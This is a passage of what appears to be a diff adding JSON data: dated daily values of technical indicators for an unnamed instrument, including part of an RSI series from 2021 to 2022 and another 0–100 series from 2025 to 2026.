"2025-01-21", + 43.958462527710886 + ], + [ + "2025-01-22", + 45.61820849097198 + ], + [ + "2025-01-23", + 44.798211211971214 + ], + [ + "2025-01-24", + 44.4375870826838 + ], + [ + "2025-01-27", + 54.09561476556794 + ], + [ + "2025-01-28", + 57.72187624121471 + ], + [ + "2025-01-29", + 55.36359002755087 + ], + [ + "2025-01-30", + 52.92950928777241 + ], + [ + "2025-01-31", + 51.68833249011819 + ], + [ + "2025-02-03", + 52.72645351015151 + ], + [ + "2025-02-04", + 51.18055250295891 + ], + [ + "2025-02-05", + 49.58553316942287 + ], + [ + "2025-02-06", + 44.430715081474254 + ], + [ + "2025-02-07", + 47.37911814232764 + ], + [ + "2025-02-10", + 44.39245479380122 + ], + [ + "2025-02-11", + 44.21693504748862 + ], + [ + "2025-02-12", + 44.075025494116844 + ], + [ + "2025-02-13", + 39.470868401589264 + ], + [ + "2025-02-14", + 38.19715816219845 + ], + [ + "2025-02-18", + 34.43908054120175 + ], + [ + "2025-02-19", + 34.164517262288285 + ], + [ + "2025-02-20", + 31.90118537806068 + ], + [ + "2025-02-21", + 39.515075764480265 + ], + [ + "2025-02-24", + 41.160326550378734 + ], + [ + "2025-02-25", + 28.987190425954424 + ], + [ + "2025-02-26", + 24.379299006798057 + ], + [ + "2025-02-27", + 37.487744168489726 + ], + [ + "2025-02-28", + 41.849545801608514 + ], + [ + "2025-03-03", + 47.93309716447504 + ], + [ + "2025-03-04", + 47.46440148438506 + ], + [ + "2025-03-05", + 47.871850601602205 + ], + [ + "2025-03-06", + 55.98882208436016 + ], + [ + "2025-03-07", + 56.51930320387626 + ], + [ + "2025-03-10", + 70.1223187349122 + ], + [ + "2025-03-11", + 66.4595483683759 + ], + [ + "2025-03-12", + 69.91221922392943 + ], + [ + "2025-03-13", + 71.39652307615097 + ], + [ + "2025-03-14", + 77.04697413054126 + ], + [ + "2025-03-17", + 77.68239135841291 + ], + [ + "2025-03-18", + 78.31296628928177 + ], + [ + "2025-03-19", + 81.9985973251475 + ], + [ + "2025-03-20", + 82.0264627004756 + ], + [ + "2025-03-21", + 79.99625950118921 + ], + [ + "2025-03-24", + 86.07834039621962 + ], + [ + "2025-03-25", + 85.67305226828621 + ], + [ + "2025-03-26", + 88.23216367636988 + ], + [ + "2025-03-27", + 81.3858795792377 + ], + [ + "2025-03-28", + 83.9313993621237 + ], + [ + "2025-03-31", + 80.37861389865044 + ], + [ + "2025-04-01", + 81.55543979599057 + ], + [ + "2025-04-02", + 79.97216984580967 + ], + [ + "2025-04-03", + 100.0 + ], + [ + "2025-04-04", + 100.0 + ], + [ + "2025-04-07", + 93.87346769961931 + ], + [ + "2025-04-08", + 95.04746660262839 + ], + [ + "2025-04-09", + 100.0 + ], + [ + "2025-04-10", + 100.0 + ], + [ + "2025-04-11", + 99.3532410429955 + ], + [ + "2025-04-14", + 99.37595864725643 + ], + [ + "2025-04-15", + 98.85956772907645 + ], + [ + "2025-04-16", + 100.0 + ], + [ + "2025-04-17", + 100.0 + ], + [ + "2025-04-21", + 100.0 + ], + [ + "2025-04-22", + 100.0 + ], + [ + "2025-04-23", + 100.0 + ], + [ + "2025-04-24", + 100.0 + ], + [ + "2025-04-25", + 100.0 + ], + [ + "2025-04-28", + 98.44854645220488 + ], + [ + "2025-04-29", + 98.51210968157075 + ], + [ + "2025-04-30", + 98.41494212337545 + ], + [ + "2025-05-01", + 98.56674673376027 + ], + [ + "2025-05-02", + 91.80286059250497 + ], + [ + "2025-05-05", + 81.21212060886371 + ], + [ + "2025-05-06", + 81.82111258331491 + ], + [ + "2025-05-07", + 80.07584970623346 + ], + [ + "2025-05-08", + 38.323871358763114 + ], + [ + "2025-05-09", + 28.57981746356493 + ], + [ + "2025-05-12", + 34.24257672120857 + ], + [ + "2025-05-13", + 34.676612679767295 + ], + [ + "2025-05-14", + 34.56367997751205 + ], + [ + "2025-05-15", + 27.544698436743897 + ], + [ + "2025-05-16", + 27.182372854394494 + ], + [ + "2025-05-19", + 20.89195741706473 + ], + [ + "2025-05-20", + 19.947802402407465 + ], + [ + "2025-05-21", + 21.295771677477727 + ], + [ + "2025-05-22", + 17.761503865588814 + ], + [ + "2025-05-23", + 18.78455182423461 + ], + [ + "2025-05-27", + 21.083589635132565 + ], + [ + "2025-05-28", + 21.571696247024224 + ], + [ + "2025-05-29", + 21.500659345565122 + ], + [ + "2025-05-30", + 21.36126138685837 + ], + [ + "2025-06-02", + 20.50897233037623 + ], + [ + "2025-06-03", + 20.02322684720015 + ], + [ + "2025-06-04", + 18.734255400800816 + ], + [ + "2025-06-05", + 19.741245989676454 + ], + [ + "2025-06-06", + 17.089299587993327 + ], + [ + "2025-06-09", + 16.97008419651694 + ], + [ + "2025-06-10", + 5.661437160060059 + ], + [ + "2025-06-11", + 4.132561317670838 + ], + [ + "2025-06-12", + 3.924887256616932 + ], + [ + "2025-06-13", + 5.821345390158383 + ], + [ + "2025-06-16", + 7.290101447938091 + ], + [ + "2025-06-17", + 8.3481235077653 + ], + [ + "2025-06-18", + 8.20339797295984 + ], + [ + "2025-06-20", + 6.419806148878069 + ], + [ + "2025-06-23", + 7.189592554058296 + ], + [ + "2025-06-24", + 7.445841924776805 + ], + [ + "2025-06-25", + 3.006888735810611 + ], + [ + "2025-06-26", + 3.088884972083429 + ], + [ + "2025-06-27", + 3.085741402189085 + ], + [ + "2025-06-30", + 3.0097320597938477 + ], + [ + "2025-07-01", + 4.055282292788644 + ], + [ + "2025-07-02", + 3.932331229731725 + ], + [ + "2025-07-03", + 4.456810365945907 + ], + [ + "2025-07-07", + 4.386554332331767 + ], + [ + "2025-07-08", + 3.858493578531224 + ], + [ + "2025-07-09", + 4.095409813711991 + ], + [ + "2025-07-10", + 4.032805375618382 + ], + [ + "2025-07-11", + 3.3957076822593466 + ], + [ + "2025-07-14", + 1.953651904886685 + ], + [ + "2025-07-15", + 0.0 + ], + [ + "2025-07-16", + 0.0 + ], + [ + "2025-07-17", + 0.0 + ], + [ + "2025-07-18", + 0.06941545546547276 + ], + [ + "2025-07-21", + 0.0 + ], + [ + "2025-07-22", + 0.16988387208604697 + ], + [ + "2025-07-23", + 0.0 + ], + [ + "2025-07-24", + 0.0 + ], + [ + "2025-07-25", + 0.0 + ], + [ + "2025-07-28", + 0.0 + ], + [ + "2025-07-29", + 0.0 + ], + [ + "2025-07-30", + 0.0 + ], + [ + "2025-07-31", + 0.38457280898306934 + ], + [ + "2025-08-01", + 5.3980918596510445 + ], + [ + "2025-08-04", + 8.493221308682916 + ], + [ + "2025-08-05", + 9.135878876565007 + ], + [ + "2025-08-06", + 10.170226356459162 + ], + [ + "2025-08-07", + 10.162947977650573 + ], + [ + "2025-08-08", + 10.587169385641431 + ], + [ + "2025-08-11", + 10.745106179704603 + ], + [ + "2025-08-12", + 11.838432981565912 + ], + [ + "2025-08-13", + 11.848790812019207 + ], + [ + "2025-08-14", + 11.563955890774684 + ], + [ + "2025-08-15", + 11.859205341953329 + ], + [ + "2025-08-18", + 11.738598405948629 + ], + [ + "2025-08-19", + 13.32543394846511 + ], + [ + "2025-08-20", + 13.548942188767901 + ], + [ + "2025-08-21", + 13.68622074478038 + ], + [ + "2025-08-22", + 15.556853624394689 + ], + [ + "2025-08-25", + 15.564213027147572 + ], + [ + "2025-08-26", + 15.648314922582983 + ], + [ + "2025-08-27", + 15.653880128677386 + ], + [ + "2025-08-28", + 15.581517444345655 + ], + [ + "2025-08-29", + 13.227063627559655 + ], + [ + "2025-09-02", + 11.130362862522633 + ], + [ + "2025-09-03", + 11.139072139254226 + ], + [ + "2025-09-04", + 10.45262299889192 + ], + [ + "2025-09-05", + 10.373953249636344 + ], + [ + "2025-09-08", + 9.810944636889532 + ], + [ + "2025-09-09", + 9.752142135773436 + ], + [ + "2025-09-10", + 8.191135985613187 + ], + [ + "2025-09-11", + 8.527537496163959 + ], + [ + "2025-09-12", + 8.670783178778226 + ], + [ + "2025-09-15", + 8.988935802017975 + ], + [ + "2025-09-16", + 9.007071581255545 + ], + [ + "2025-09-17", + 6.601249903433502 + ], + [ + "2025-09-18", + 6.386609297786909 + ], + [ + "2025-09-19", + 5.911428422034903 + ], + [ + "2025-09-22", + 4.048838694346394 + ], + [ + "2025-09-23", + 4.7950004237850425 + ], + [ + "2025-09-24", + 5.1846907213888365 + ], + [ + "2025-09-25", + 5.687123252893571 + ], + [ + "2025-09-26", + 5.505173031846193 + ], + [ + "2025-09-29", + 2.9103692258598413 + ], + [ + "2025-09-30", + 0.9381066021620812 + ], + [ + "2025-10-01", + 0.5798470557236287 + ], + [ + "2025-10-02", + 0.0 + ], + [ + "2025-10-03", + 0.8191780626793574 + ], + [ + "2025-10-06", + 1.1678822334773984 + ], + [ + "2025-10-07", + 2.0941939914220766 + ], + [ + "2025-10-08", + 3.2847151441238163 + ], + [ + "2025-10-09", + 3.325189593637886 + ], + [ + "2025-10-10", + 16.69224882580382 + ], + [ + "2025-10-13", + 19.438252975003127 + ], + [ + "2025-10-14", + 19.82397236475636 + ], + [ + "2025-10-15", + 20.02557701534113 + ], + [ + "2025-10-16", + 19.669832330463347 + ], + [ + "2025-10-17", + 19.646431485506504 + ], + [ + "2025-10-20", + 20.48323328153797 + ], + [ + "2025-10-21", + 20.087945480690454 + ], + [ + "2025-10-22", + 20.75073426578712 + ], + [ + "2025-10-23", + 20.91457026124547 + ], + [ + "2025-10-24", + 21.415736605616097 + ], + [ + "2025-10-27", + 23.02550695915481 + ], + [ + "2025-10-28", + 23.19941255277584 + ], + [ + "2025-10-29", + 23.188132989168 + ], + [ + "2025-10-30", + 25.067033129596066 + ], + [ + "2025-10-31", + 24.86999896398059 + ], + [ + "2025-11-03", + 24.725245496454487 + ], + [ + "2025-11-04", + 27.336644218129535 + ], + [ + "2025-11-05", + 26.89236962914257 + ], + [ + "2025-11-06", + 28.986701489675422 + ], + [ + "2025-11-07", + 21.1703457818518 + ], + [ + "2025-11-10", + 21.35738050860451 + ], + [ + "2025-11-11", + 20.99485411428481 + ], + [ + "2025-11-12", + 20.84876939417025 + ], + [ + "2025-11-13", + 23.821685546753113 + ], + [ + "2025-11-14", + 23.602323040162325 + ], + [ + "2025-11-17", + 23.010943221450788 + ], + [ + "2025-11-18", + 23.79707182751672 + ], + [ + "2025-11-19", + 23.573103480223274 + ], + [ + "2025-11-20", + 26.13649233174468 + ], + [ + "2025-11-21", + 25.73486665370875 + ], + [ + "2025-11-24", + 27.848740882607615 + ], + [ + "2025-11-25", + 27.69182494056322 + ], + [ + "2025-11-26", + 28.120951428725288 + ], + [ + "2025-11-28", + 27.397292313050375 + ], + [ + "2025-12-01", + 27.24513913469686 + ], + [ + "2025-12-02", + 27.504294965496857 + ], + [ + "2025-12-03", + 25.126019592539393 + ], + [ + "2025-12-04", + 24.880984371080682 + ], + [ + "2025-12-05", + 22.602600332980465 + ], + [ + "2025-12-08", + 22.532412738259023 + ], + [ + "2025-12-09", + 19.399435613737033 + ], + [ + "2025-12-10", + 19.428149174991496 + ], + [ + "2025-12-11", + 19.5099936843456 + ], + [ + "2025-12-12", + 19.2002474466871 + ], + [ + "2025-12-15", + 19.400353760957458 + ], + [ + "2025-12-16", + 18.841963399109705 + ], + [ + "2025-12-17", + 20.35064963974356 + ], + [ + "2025-12-18", + 21.476579740448557 + ], + [ + "2025-12-19", + 17.746079928156316 + ], + [ + "2025-12-22", + 17.591948180147547 + ], + [ + "2025-12-23", + 13.09123912952497 + ], + [ + "2025-12-24", + 12.89850427375817 + ], + [ + "2025-12-26", + 12.356583198265369 + ], + [ + "2025-12-29", + 12.181258136728058 + ], + [ + "2025-12-30", + 12.14902578598263 + ], + [ + "2025-12-31", + 12.189741792954749 + ], + [ + "2026-01-02", + 12.11996778541917 + ], + [ + "2026-01-05", + 12.810812459402568 + ], + [ + "2026-01-06", + 13.40235143300648 + ], + [ + "2026-01-07", + 13.379139807733528 + ], + [ + "2026-01-08", + 13.647876694892435 + ], + [ + "2026-01-09", + 14.363895690829368 + ], + [ + "2026-01-12", + 14.283215473380004 + ], + [ + "2026-01-13", + 10.587317941776462 + ], + [ + "2026-01-14", + 11.534555884850949 + ], + [ + "2026-01-15", + 11.588375140421707 + ], + [ + "2026-01-16", + 7.525257665550614 + ], + [ + "2026-01-20", + 10.638374487702022 + ], + [ + "2026-01-21", + 10.673855496775525 + ], + [ + "2026-01-22", + 11.014968745320838 + ], + [ + "2026-01-23", + 10.885522786289924 + ], + [ + "2026-01-26", + 10.999357878959184 + ], + [ + "2026-01-27", + 11.714765414111222 + ], + [ + "2026-01-28", + 11.468074135451973 + ], + [ + "2026-01-29", + 11.807347343185144 + ], + [ + "2026-01-30", + 12.551509009373902 + ], + [ + "2026-02-02", + 12.80249798284115 + ], + [ + "2026-02-03", + 14.553707609186727 + ], + [ + "2026-02-04", + 16.087244257610305 + ], + [ + "2026-02-05", + 17.223147793432332 + ], + [ + "2026-02-06", + 20.743338674656904 + ], + [ + "2026-02-09", + 20.462236113082454 + ], + [ + "2026-02-10", + 20.517775205996486 + ], + [ + "2026-02-11", + 20.612965032067148 + ], + [ + "2026-02-12", + 22.490823019676963 + ], + [ + "2026-02-13", + 22.384438510375183 + ], + [ + "2026-02-17", + 22.389152125259198 + ], + [ + "2026-02-18", + 20.087228139931906 + ], + [ + "2026-02-19", + 18.764254538266805 + ], + [ + "2026-02-20", + 18.89749922567637 + ], + [ + "2026-02-23", + 19.58825724117603 + ], + [ + "2026-02-24", + 20.4165863902069 + ], + [ + "2026-02-25", + 21.334933290895304 + ], + [ + "2026-02-26", + 21.87762868237024 + ], + [ + "2026-02-27", + 21.78494592975489 + ], + [ + "2026-03-02", + 21.06654750101001 + ], + [ + "2026-03-03", + 21.147997824023605 + ], + [ + "2026-03-04", + 21.562538935566 + ], + [ + "2026-03-05", + 19.507993804105087 + ], + [ + "2026-03-06", + 19.706405332791032 + ], + [ + "2026-03-09", + 17.7846565524749 + ], + [ + "2026-03-10", + 17.29034912092489 + ], + [ + "2026-03-11", + 17.15803196707246 + ], + [ + "2026-03-12", + 19.043105912126006 + ], + [ + "2026-03-13", + 16.39603687846279 + ], + [ + "2026-03-16", + 17.420204042398407 + ], + [ + "2026-03-17", + 17.607271566990416 + ], + [ + "2026-03-18", + 18.611566568424575 + ], + [ + "2026-03-19", + 18.58233128708931 + ], + [ + "2026-03-20", + 20.05888175904987 + ], + [ + "2026-03-23", + 20.539088250752783 + ], + [ + "2026-03-24", + 19.692710288414894 + ], + [ + "2026-03-25", + 18.30912033389744 + ], + [ + "2026-03-26", + 20.920434445209445 + ], + [ + "2026-03-27", + 22.73922743335387 + ], + [ + "2026-03-30", + 22.64321668747003 + ], + [ + "2026-03-31", + 30.252533693753875 + ], + [ + "2026-04-01", + 29.807886186341925 + ], + [ + "2026-04-02", + 29.84781878100295 + ], + [ + "2026-04-06", + 29.11728605598882 + ], + [ + "2026-04-07", + 27.985735724622014 + ], + [ + "2026-04-08", + 32.831335660445994 + ], + [ + "2026-04-09", + 33.05447818810173 + ], + [ + "2026-04-10", + 31.426684559734852 + ], + [ + "2026-04-13", + 31.47636787938417 + ], + [ + "2026-04-14", + 32.38747462335676 + ], + [ + "2026-04-15", + 33.03067669308783 + ], + [ + "2026-04-16", + 31.44719184974833 + ], + [ + "2026-04-17", + 31.576696758796814 + ], + [ + "2026-04-20", + 28.782651643074747 + ], + [ + "2026-04-21", + 28.97674042165249 + ], + [ + "2026-04-22", + 28.838516527823714 + ], + [ + "2026-04-23", + 29.49569571015431 + ] + ], + "rsi": [ + [ + "2021-04-26", + 50.0 + ], + [ + "2021-04-27", + 0.0 + ], + [ + "2021-04-28", + 0.0 + ], + [ + "2021-04-29", + 6.053379813946037 + ], + [ + "2021-04-30", + 5.408881476091793 + ], + [ + "2021-05-03", + 4.950671239241132 + ], + [ + "2021-05-04", + 3.788896732663787 + ], + [ + "2021-05-05", + 3.6210091579644086 + ], + [ + "2021-05-06", + 12.906575735572872 + ], + [ + "2021-05-07", + 21.716995729137494 + ], + [ + "2021-05-10", + 16.184832624801118 + ], + [ + "2021-05-11", + 15.951504974482646 + ], + [ + "2021-05-12", + 12.36084553771363 + ], + [ + "2021-05-13", + 18.135048062309522 + ], + [ + "2021-05-14", + 32.0164418938255 + ], + [ + "2021-05-17", + 30.454540255042602 + ], + [ + "2021-05-18", + 28.782132233128678 + ], + [ + "2021-05-19", + 29.486590577468746 + ], + [ + "2021-05-20", + 40.22664760433944 + ], + [ + "2021-05-21", + 38.39003076522265 + ], + [ + "2021-05-24", + 46.360206737662416 + ], + [ + "2021-05-25", + 46.97807631403978 + ], + [ + "2021-05-26", + 48.58607883500974 + ], + [ + "2021-05-27", + 46.93418061626447 + ], + [ + "2021-05-28", + 48.517663679116325 + ], + [ + "2021-06-01", + 46.923632063988265 + ], + [ + "2021-06-02", + 48.00096510536689 + ], + [ + "2021-06-03", + 42.98472609302521 + ], + [ + "2021-06-04", + 51.74848603556223 + ], + [ + "2021-06-07", + 53.13388351229807 + ], + [ + "2021-06-08", + 53.36460274269949 + ], + [ + "2021-06-09", + 53.48784941106672 + ], + [ + "2021-06-10", + 58.652680058925526 + ], + [ + "2021-06-11", + 59.86953669066998 + ], + [ + "2021-06-14", + 64.05538649972061 + ], + [ + "2021-06-15", + 59.45986673461652 + ], + [ + "2021-06-16", + 57.0126058869136 + ], + [ + "2021-06-17", + 62.734124343625815 + ], + [ + "2021-06-18", + 57.569622792492716 + ], + [ + "2021-06-21", + 60.33296575636987 + ], + [ + "2021-06-22", + 64.12996469686102 + ], + [ + "2021-06-23", + 64.32478853212233 + ], + [ + "2021-06-24", + 66.78120667724284 + ], + [ + "2021-06-25", + 65.80522309935762 + ], + [ + "2021-06-28", + 70.40831654866106 + ], + [ + "2021-06-29", + 71.6462051255316 + ], + [ + "2021-06-30", + 70.2612580570499 + ], + [ + "2021-07-01", + 70.41521833421304 + ], + [ + "2021-07-02", + 74.54166310098236 + ], + [ + "2021-07-06", + 75.91918232771087 + ], + [ + "2021-07-07", + 76.58808500447788 + ], + [ + "2021-07-08", + 70.53555318046696 + ], + [ + "2021-07-09", + 72.90490481231288 + ], + [ + "2021-07-12", + 74.30558213309828 + ], + [ + "2021-07-13", + 74.30558213309828 + ], + [ + "2021-07-14", + 74.99668063362074 + ], + [ + "2021-07-15", + 67.34446145460673 + ], + [ + "2021-07-16", + 59.81811138345509 + ], + [ + "2021-07-19", + 53.37214160076267 + ], + [ + "2021-07-20", + 59.91339518349476 + ], + [ + "2021-07-21", + 63.609685509339094 + ], + [ + "2021-07-22", + 66.48157638933714 + ], + [ + "2021-07-23", + 70.88206414000597 + ], + [ + "2021-07-26", + 71.16031356636483 + ], + [ + "2021-07-27", + 62.199457721643064 + ], + [ + "2021-07-28", + 63.8881883025937 + ], + [ + "2021-07-29", + 64.67716452616114 + ], + [ + "2021-07-30", + 60.494569362217675 + ], + [ + "2021-08-02", + 60.537687190089855 + ], + [ + "2021-08-03", + 63.6856403321769 + ], + [ + "2021-08-04", + 64.41860116062468 + ], + [ + "2021-08-05", + 67.52259099857514 + ], + [ + "2021-08-06", + 63.3826074912119 + ], + [ + "2021-08-09", + 64.3701744595985 + ], + [ + "2021-08-10", + 59.56210833521639 + ], + [ + "2021-08-11", + 58.00678477588332 + ], + [ + "2021-08-12", + 60.343217376274566 + ], + [ + "2021-08-13", + 62.53722544144235 + ], + [ + "2021-08-16", + 62.81208170067804 + ], + [ + "2021-08-17", + 54.12720518451382 + ], + [ + "2021-08-18", + 46.6100021386899 + ], + [ + "2021-08-19", + 50.30505178158679 + ], + [ + "2021-08-20", + 57.18041224422703 + ], + [ + "2021-08-23", + 64.82589909671876 + ], + [ + "2021-08-24", + 66.1740946976465 + ], + [ + "2021-08-25", + 66.69260855417838 + ], + [ + "2021-08-26", + 61.10849194999914 + ], + [ + "2021-08-27", + 65.79919237803588 + ], + [ + "2021-08-30", + 70.29667898402926 + ], + [ + "2021-08-31", + 69.57276959993699 + ], + [ + "2021-09-01", + 70.24314437392454 + ], + [ + "2021-09-02", + 69.77042333688627 + ], + [ + "2021-09-03", + 71.13133221304022 + ], + [ + "2021-09-07", + 71.76324177031037 + ], + [ + "2021-09-08", + 67.82573282858057 + ], + [ + "2021-09-09", + 64.09497932888131 + ], + [ + "2021-09-10", + 56.709990154743195 + ], + [ + "2021-09-13", + 56.081797412535636 + ], + [ + "2021-09-14", + 53.45758463021374 + ], + [ + "2021-09-15", + 58.863292474715614 + ], + [ + "2021-09-16", + 59.33720713425716 + ], + [ + "2021-09-17", + 48.884917227887506 + ], + [ + "2021-09-20", + 36.83648615013813 + ], + [ + "2021-09-21", + 37.79927305118878 + ], + [ + "2021-09-22", + 44.699009901505484 + ], + [ + "2021-09-23", + 50.584856644126994 + ], + [ + "2021-09-24", + 51.15913489323533 + ], + [ + "2021-09-27", + 46.23045867115801 + ], + [ + "2021-09-28", + 33.87115201886817 + ], + [ + "2021-09-29", + 33.330942834489974 + ], + [ + "2021-09-30", + 32.0974610910187 + ], + [ + "2021-10-01", + 36.36279701754588 + ], + [ + "2021-10-04", + 29.554348435454827 + ], + [ + "2021-10-05", + 37.49055286460131 + ], + [ + "2021-10-06", + 40.93777642080648 + ], + [ + "2021-10-07", + 45.594062265329164 + ], + [ + "2021-10-08", + 43.5653804362455 + ], + [ + "2021-10-11", + 40.58886066361864 + ], + [ + "2021-10-12", + 39.284494454186984 + ], + [ + "2021-10-13", + 43.739409454311975 + ], + [ + "2021-10-14", + 52.44954297079017 + ], + [ + "2021-10-15", + 55.06009947785591 + ], + [ + "2021-10-18", + 58.957415441309536 + ], + [ + "2021-10-19", + 61.6778669853622 + ], + [ + "2021-10-20", + 60.92227331730865 + ], + [ + "2021-10-21", + 63.19179455796709 + ], + [ + "2021-10-22", + 58.15652542855094 + ], + [ + "2021-10-25", + 62.08730965381347 + ], + [ + "2021-10-26", + 63.24267365458904 + ], + [ + "2021-10-27", + 64.11363279566686 + ], + [ + "2021-10-28", + 68.02620326288746 + ], + [ + "2021-10-29", + 69.62348380663678 + ], + [ + "2021-11-01", + 70.72358027507775 + ], + [ + "2021-11-02", + 72.06082342552966 + ], + [ + "2021-11-03", + 75.17420927322254 + ], + [ + "2021-11-04", + 78.34545742780507 + ], + [ + "2021-11-05", + 78.56775130373185 + ], + [ + "2021-11-08", + 77.35236778092023 + ], + [ + "2021-11-09", + 71.32429879456694 + ], + [ + "2021-11-10", + 60.5491264356658 + ], + [ + "2021-11-11", + 61.70711556708603 + ], + [ + "2021-11-12", + 65.81930044801774 + ], + [ + "2021-11-15", + 65.65300528379542 + ], + [ + "2021-11-16", + 68.34190443902216 + ], + [ + "2021-11-17", + 68.5401500467861 + ], + [ + "2021-11-18", + 72.2155959591006 + ], + [ + "2021-11-19", + 73.99455829197089 + ], + [ + "2021-11-22", + 64.65968388690229 + ], + [ + "2021-11-23", + 61.421623492435046 + ], + [ + "2021-11-24", + 62.83142445737897 + ], + [ + "2021-11-26", + 50.981079423097846 + ], + [ + "2021-11-29", + 60.08554705335734 + ], + [ + "2021-11-30", + 52.785562014110624 + ], + [ + "2021-12-01", + 45.92697210102149 + ], + [ + "2021-12-02", + 48.9042325676036 + ], + [ + "2021-12-03", + 42.744806331423185 + ], + [ + "2021-12-06", + 46.05776069089936 + ], + [ + "2021-12-07", + 56.35957364510515 + ], + [ + "2021-12-08", + 57.6913558243106 + ], + [ + "2021-12-09", + 52.04146742273376 + ], + [ + "2021-12-10", + 55.46068066482608 + ], + [ + "2021-12-13", + 50.274801692249966 + ], + [ + "2021-12-14", + 46.93752044708418 + ], + [ + "2021-12-15", + 54.091424800438354 + ], + [ + "2021-12-16", + 46.3308627586528 + ], + [ + "2021-12-17", + 45.016108408181694 + ], + [ + "2021-12-20", + 42.503250499848356 + ], + [ + "2021-12-21", + 49.44683037051957 + ], + [ + "2021-12-22", + 52.857775226078424 + ], + [ + "2021-12-23", + 54.91067166268129 + ], + [ + "2021-12-27", + 59.14278006908508 + ], + [ + "2021-12-28", + 57.48629384627571 + ], + [ + "2021-12-29", + 57.43076532734058 + ], + [ + "2021-12-30", + 56.25922481680981 + ], + [ + "2021-12-31", + 53.79716906235174 + ], + [ + "2022-01-03", + 56.90850313492678 + ], + [ + "2022-01-04", + 51.79847458405127 + ], + [ + "2022-01-05", + 42.24767810321181 + ], + [ + "2022-01-06", + 42.062469968529065 + ], + [ + "2022-01-07", + 39.211212966869255 + ], + [ + "2022-01-10", + 39.476669347564936 + ], + [ + "2022-01-11", + 45.34839565088208 + ], + [ + "2022-01-12", + 46.836658482614226 + ], + [ + "2022-01-13", + 39.49993950836647 + ], + [ + "2022-01-14", + 41.877859124321894 + ], + [ + "2022-01-18", + 35.78120365179872 + ], + [ + "2022-01-19", + 33.520168099295844 + ], + [ + "2022-01-20", + 31.049048600429956 + ], + [ + "2022-01-21", + 26.599292885329476 + ], + [ + "2022-01-24", + 28.373791631972168 + ], + [ + "2022-01-25", + 25.055485610308097 + ], + [ + "2022-01-26", + 24.849141679184868 + ], + [ + "2022-01-27", + 23.509296632460433 + ], + [ + "2022-01-28", + 35.12539486594413 + ], + [ + "2022-01-31", + 44.64401311901543 + ], + [ + "2022-02-01", + 46.49998732205677 + ], + [ + "2022-02-02", + 48.7261560621024 + ], + [ + "2022-02-03", + 39.76304235484686 + ], + [ + "2022-02-04", + 43.12645051675404 + ], + [ + "2022-02-07", + 41.51443915893111 + ], + [ + "2022-02-08", + 44.603684572750595 + ], + [ + "2022-02-09", + 50.02567040019477 + ], + [ + "2022-02-10", + 44.86761390684218 + ], + [ + "2022-02-11", + 38.943867130410936 + ], + [ + "2022-02-14", + 39.27044248981047 + ], + [ + "2022-02-15", + 45.569821877847936 + ], + [ + "2022-02-16", + 45.51687751625573 + ], + [ + "2022-02-17", + 39.67374578462152 + ], + [ + "2022-02-18", + 37.73290807614339 + ], + [ + "2022-02-22", + 36.07827987314158 + ], + [ + "2022-02-23", + 32.234837409421814 + ], + [ + "2022-02-24", + 40.901709568723845 + ], + [ + "2022-02-25", + 44.5447849695171 + ], + [ + "2022-02-28", + 45.25376121802132 + ], + [ + "2022-03-01", + 42.25454604966138 + ], + [ + "2022-03-02", + 46.38403796756695 + ], + [ + "2022-03-03", + 43.48519390544689 + ], + [ + "2022-03-04", + 40.74295976218982 + ], + [ + "2022-03-07", + 34.8133732271763 + ], + [ + "2022-03-08", + 34.163430807327074 + ], + [ + "2022-03-09", + 42.99792367206899 + ], + [ + "2022-03-10", + 41.09977818446331 + ], + [ + "2022-03-11", + 37.782576651716525 + ], + [ + "2022-03-14", + 35.02210389183266 + ], + [ + "2022-03-15", + 42.29542776810205 + ], + [ + "2022-03-16", + 49.690825686134374 + ], + [ + "2022-03-17", + 51.936532365422345 + ], + [ + "2022-03-18", + 55.58968600179322 + ], + [ + "2022-03-21", + 54.966080223972064 + ], + [ + "2022-03-22", + 58.500398691217136 + ], + [ + "2022-03-23", + 55.032216078042424 + ], + [ + "2022-03-24", + 59.020430859057 + ], + [ + "2022-03-25", + 58.80499103082349 + ], + [ + "2022-03-28", + 61.602863957370495 + ], + [ + "2022-03-29", + 64.53289242895454 + ], + [ + "2022-03-30", + 61.246893658737825 + ], + [ + "2022-03-31", + 57.73348166738796 + ], + [ + "2022-04-01", + 57.197688832410414 + ], + [ + "2022-04-04", + 61.36701756506568 + ], + [ + "2022-04-05", + 55.01480561089946 + ], + [ + "2022-04-06", + 49.71606279233928 + ], + [ + "2022-04-07", + 50.268794111604265 + ], + [ + "2022-04-08", + 46.991072145446466 + ], + [ + "2022-04-11", + 42.062558736678604 + ], + [ + "2022-04-12", + 41.25032334544508 + ], + [ + "2022-04-13", + 46.574114961770455 + ], + [ + "2022-04-14", + 41.88252848920071 + ], + [ + "2022-04-18", + 42.08880639705066 + ], + [ + "2022-04-19", + 47.887250971078 + ], + [ + "2022-04-20", + 44.67371905235884 + ], + [ + "2022-04-21", + 40.57441505615267 + ], + [ + "2022-04-22", + 36.14724274774036 + ], + [ + "2022-04-25", + 39.5410554373324 + ], + [ + "2022-04-26", + 33.785797442053905 + ], + [ + "2022-04-27", + 33.62477774416247 + ], + [ + "2022-04-28", + 42.37917613167922 + ], + [ + "2022-04-29", + 35.722207268755525 + ], + [ + "2022-05-02", + 39.357199072377526 + ], + [ + "2022-05-03", + 39.596336843622346 + ], + [ + "2022-05-04", + 46.764584687582364 + ], + [ + "2022-05-05", + 39.07468330684851 + ], + [ + "2022-05-06", + 37.57166520534098 + ], + [ + "2022-05-09", + 33.14180430615538 + ], + [ + "2022-05-10", + 35.582089802782534 + ], + [ + "2022-05-11", + 32.43213924552346 + ], + [ + "2022-05-12", + 32.19468628708698 + ], + [ + "2022-05-13", + 39.63659895012252 + ], + [ + "2022-05-16", + 38.173036216957 + ], + [ + "2022-05-17", + 43.16446045589116 + ], + [ + "2022-05-18", + 36.92272436135414 + ], + [ + "2022-05-19", + 36.335425141235525 + ], + [ + "2022-05-20", + 35.97985493393833 + ], + [ + "2022-05-23", + 39.386712085419106 + ], + [ + "2022-05-24", + 36.655765166744885 + ], + [ + "2022-05-25", + 39.56309309327579 + ], + [ + "2022-05-26", + 45.01847102413645 + ], + [ + "2022-05-27", + 50.80774936319677 + ], + [ + "2022-05-31", + 50.32877838842105 + ], + [ + "2022-06-01", + 48.94701099574661 + ], + [ + "2022-06-02", + 53.95112347143804 + ], + [ + "2022-06-03", + 48.91134338780429 + ], + [ + "2022-06-06", + 49.544257775078144 + ], + [ + "2022-06-07", + 51.23457234216282 + ], + [ + "2022-06-08", + 49.72499841876498 + ], + [ + "2022-06-09", + 44.50651042200896 + ], + [ + "2022-06-10", + 38.87569202747313 + ], + [ + "2022-06-13", + 33.13428667838687 + ], + [ + 